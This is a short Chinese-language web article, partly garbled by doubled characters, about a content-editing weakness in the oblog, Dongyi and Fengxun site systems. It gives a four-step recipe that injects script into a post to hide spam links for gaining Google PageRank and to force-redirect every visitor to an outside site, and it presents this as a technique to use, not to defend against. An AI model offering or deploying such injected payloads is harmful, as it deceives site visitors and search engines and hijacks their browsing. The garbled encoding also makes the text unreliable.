關(guān)于oblog、動易、風(fēng)訊等擁有源碼編輯的程序漏洞淺析
目前的oblog、動易、風(fēng)訊等一系列著名的系統(tǒng),都存在源碼編輯漏洞。
具體操作是:
1,進入"源碼"編輯
2,輸入階段公分四段:
第一段:<此處輸入正文,做事需要手下留情嘛,來點實際內(nèi)容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此處輸入作弊鏈接,獲取google的pr值,此處的內(nèi)容將不會被瀏覽者看 到,且不會被搜索引擎發(fā)現(xiàn)>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不設(shè)置時間或?qū)r間設(shè)置為0,那么點擊該頁面后將直接跳轉(zhuǎn)到指定頁面。
相關(guān)文章
關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理
關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理...2007-01-01揭露88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)漏洞
88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了2008-05-05